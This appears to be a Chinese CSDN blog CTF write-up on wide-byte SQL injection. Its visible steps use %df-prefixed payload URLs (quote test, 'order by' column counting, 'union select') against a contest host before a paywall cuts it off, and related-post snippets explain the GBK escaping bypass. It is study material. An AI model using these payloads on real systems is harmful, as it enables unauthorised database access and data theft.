有趣的注入(宽字节注入)

最新推荐文章于 2024-08-13 11:12:46 发布
最新推荐文章于 2024-08-13 11:12:46 发布
阅读量2.6k 收藏 4
点赞数
分类专栏: ctf 文章标签: 有趣的注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37729662/article/details/84766326
版权
本文探讨了CTF挑战中遇到的宽字节注入问题,通过手动注入和SQLMap工具,逐步揭示了注入点的判断、表格和列的查询以及数据的dump过程,展示了如何利用宽字节注入来获取关键信息,例如flag。
摘要由CSDN通过智能技术生成

ctf:有趣的注入

(一)手注:

url:http://ctf.cdusec.org:8086/sqli.php?id=1
实验工具:火狐hackbar
x001:
输入:” ‘ “单引号无反应,再输入" %df’ "(宽字节注入,显示报错。)
截图:
在这里插入图片描述
在这里插入图片描述
x002判断列数:判断出来有3列。
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +

 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 4 -- +

x003判断注入点:

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,3 -- +

在这里插入图片描述

最低0.47元/天 解锁文章
晓小小小晓
关注
专栏目录
宽字节注入
rane的博客
03-18 287
宽字节注入原理 宽字节注入方法 以第32关为例,输入单引号后会经过check_addslashes函数替换 数据库连接的时候使用的是gbk编码 http://127.0.0.1/Less-32/?id=1%df’ order by 3–+ 三列 http://127.0.0.1/Less-32/?id=-1%df’ union select 1,2,version()–+ 使用union查询需...
有趣宽字节注入
qq_42097777的博客
04-01 312
# 宽字节注入的原理:因为一些网站数据库是GBK编码,引入了魔术引号开关,当有特殊符号时会增加转义字符“\”,宽字节注入就是用%df吃掉"\",%df和"\"可以在GBK编码中组成一个’運’字,所以就避免了被转义。 听这就很有趣,来让我们实际操作一下 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点 这里用了魔术引号,所以and 1=2,并没有报错 ,我们不知道内部的...
宽字节注入原理
qq_45730325的博客
03-03 5708
宽字节注入原理
SQL注入(宽字节、堆叠、二次注入
最新发布
m0_74249600的博客
08-13 1048
本文讲述了宽字节注入、堆叠注入、二次注入等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
宽字节注入方法原理
安全界的彭于晏的博客
06-27 203
方法 :在注入点后键入%df,然后按照正常的注入流程开始注入 黑盒测试: 有可能的注入点后键入%df,以后进行注入测试 白盒测试: 1.查看mysql编码是否为GBK 2.是否使用preg_replace把单引号替换成’ 3.是否使用addslashes进行转义 4.是否使用MYSQ_real_escape_string进行转义 ...
宽字节注入原理学习
身高两米不到的博客
03-18 4965
0x01 开篇 本题用到考点是宽字节注入,遇到这种注入类型学习记录。 推荐两篇链接:浅析白盒审计中的字符编码及SQL注入 | 离别歌 Von的博客 | Von Blog 为方便自我下次忘记,总结一下: 1.宽字节涉及到编码问题,便于理解需要看一看 2.宽字节注入现在已经很少见,因为如今的编码大多使用utf-8 常见url编码: 空格 --%20 ' --%27 # --%23 \ --%5c 0x02 原理 我们注入时都会简单输入一个 ' 或者 " ,进行测试,如果数据库过滤不严格就会产生报错
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1458
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 706
继续学习sqli-labs,本篇是less 32-37
通过Java字节码发现有趣的内幕之初始化篇(下)Java开
12-03
通过阅读和分析字节码,我们可以洞察到程序的运行流程,找出性能瓶颈,甚至实现一些高级的优化技术,如字节码注入。 在实际开发中,了解这些内幕可以带来诸多好处。比如,我们可以通过合理地安排初始化顺序,优化...
宽字节注入原理分析
m0_46304840的博客
03-09 2790
前言 什么是宽字节注入? 可以简单的理解成,拼凑转义符(\)。组成一个新的字符 而形成 宽字节注入 的方法,有: SET NAMES 'gbk' 或者(上面一行等于 下面三行) SET character_set_connection='gbk' SET character_set_results='gbk' SET character_set_client=gbk 所以,一般情况下...
sql宽字节注入原理
qq_40390383的博客
08-02 934
宽字符是指多个字节宽度的编码,如UNICODE、GBK、BIG5等。转义函数在对这些编码进行转义时会丢掉转义字符“\”(将它转换为%5C),你可以在它前面再输入一个单字符编码与它组成一个新的多字符编码,使得转义实际上没有发生作用(转义就是要留下“\”防范注入的)。 举个例子: 输入……php?name=a%df’ or 1=1;%20%23 转义函数会将%df’改成%df\’,如果你的编码是...
java 宽字节_宽字节注入
weixin_29023349的博客
02-16 467
宽字节注入原理:宽字节(两字节)带来的安全问题主要是吃ASCII字符(一字节)的现象,使用一些特殊字符来”吃掉“经过转义符 “ \ ” 。在重新详细了解宽字节注入之前,我认为宽字节注入只是出现在网站使用GBK编码的时代,现在已经很少出现了,但是实际上宽字节不只是出现在GBK编码中。在PHP中,通过iconv()进行编码转换时,也可能出现宽字节注入。还有一个误区:这里的编码问题不是出现在HTML页面...
mysql宽字节注入_宽字节注入原理
weixin_30376627的博客
02-27 360
宽字节注入产生的原理宽字节注⼊源于程序员设置MySQL连接时错误配置为:set character_set_client=gbk,这样配置会引发编码转换从⽽导致的注⼊漏洞。具体原理如下:1,正常情况下当GPC开启或使⽤addslashes函数过滤GET或POST提交的参数时,⿊客使⽤的单引号 '就会被转义为:';2,但如果存在宽字节注⼊,我们输⼊%df%27时⾸先经过上⾯提到的单引号转义变成了%...
【SQL注入宽字节注入:原理、利用
07-14 1867
【SQL-宽字节注入
宽字节注入原理与防御
wtf0712的博客
11-06 7613
gbk编码原理 一个字符占1个字节 两个字节以上叫宽字节 设置“set character_set_client=gbk”(gbk编码设置),通常导致编码转换的注入问题,尤其是使用php连接mysql数据库的时候 一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字节(64-254) 当设置gbk编码后,遇到连续两个字节,都符合gbk取值范围,会自动...
sql注入宽字节注入
07-28
SQL注入宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值